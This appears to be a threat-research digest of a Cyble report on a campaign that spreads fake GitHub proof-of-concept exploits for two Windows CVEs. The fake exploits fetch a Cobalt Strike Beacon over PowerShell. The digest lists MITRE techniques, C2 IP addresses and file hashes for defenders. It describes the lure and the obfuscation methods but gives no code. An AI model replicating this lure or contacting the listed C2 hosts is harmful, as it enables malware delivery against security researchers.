Threat Research

Cyble – Malware Campaign Targets InfoSec Community: Threat Actor Uses Fake Proof Of Concept To Deliver Cobalt-Strike Beacon

Securonix

Cyble researchers found a threat actor distributing fake PoCs for CVE-2022-26809 and CVE-2022-24500 on GitHub, targeting the Infosec community. The culprit malware is a .NET binary packed with ConfuserEX that displays fake exploit messages and then calls PowerShell to fetch a Cobalt Strike Beacon from a C2 server.

Keypoints

  • The campaign involves malware disguised as exploit PoCs for CVE-2022-26809 and CVE-2022-24500, hosted on GitHub by a single threat actor profile.
  • Attackers used fake Proof of Concept posts to lure Infosec professionals into executing the malware, with discussion on cybercrime forums about the exploits.
  • The malware is a .NET binary packed with ConfuserEX, a free protector for .NET apps, indicating obfuscation/anti-analysis.
  • Despite claims of exploiting the vulnerabilities, the sample prints a fake exploitation message and then executes shellcode, as shown in the provided figures.
  • Sleep()-based delays are used to make the fake messages appear legitimate before the payload runs.
  • Following the fake messages, the malware uses PowerShell to contact a C2 server and download the Cobalt Strike Beacon, enabling further malicious activities such as lateral movement or data exfiltration.
  • The findings underscore that the Infosec community can be a direct target, highlighting the need for source credibility verification before downloading PoCs.

MITRE Techniques

  • [T1204] User Execution – The malware relies on user execution via fake PoCs to trigger infection. “The TA used this unique technique to lure individuals into executing the malware.”
  • [T1140] Deobfuscate/Decode Files or Information – The binary is packed with ConfuserEX to hinder analysis. “The malware is a .Net binary packed with ConfuserEX, a free, open-source protector for .NET applications.”
  • [T1071] Application Layer Protocol – The malware communicates with a C2 to download the Cobalt-Strike Beacon. “the network communication to a command-and-control server for downloading the Cobalt-Strike Beacon.”

Indicators of Compromise

  • [IP] C2 IPs – 192.10.22.112, 45.197.132.72
  • [Hash] Malicious binaries – MD5: 7e0c8be0d03c75bbdc6fd286a796434a; SHA-1: 0e2e0d26caa32840a720be7f67b49d45094861cb; SHA-256: 6c676773700c1de750c3f8767dbce9106317396d66a004aabbdd29882435d5e0
  • [Hash] Malicious binaries – MD5: fdcf0aad080452fa14df221e74cca7d0; SHA-1: 7431846d707140783eea466225e872f8757533e3; SHA-256: fa78d114e4dfff90a3e4ba8c0a60f8aa95745c26cc4681340e4fda79234026fd

Read more: https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/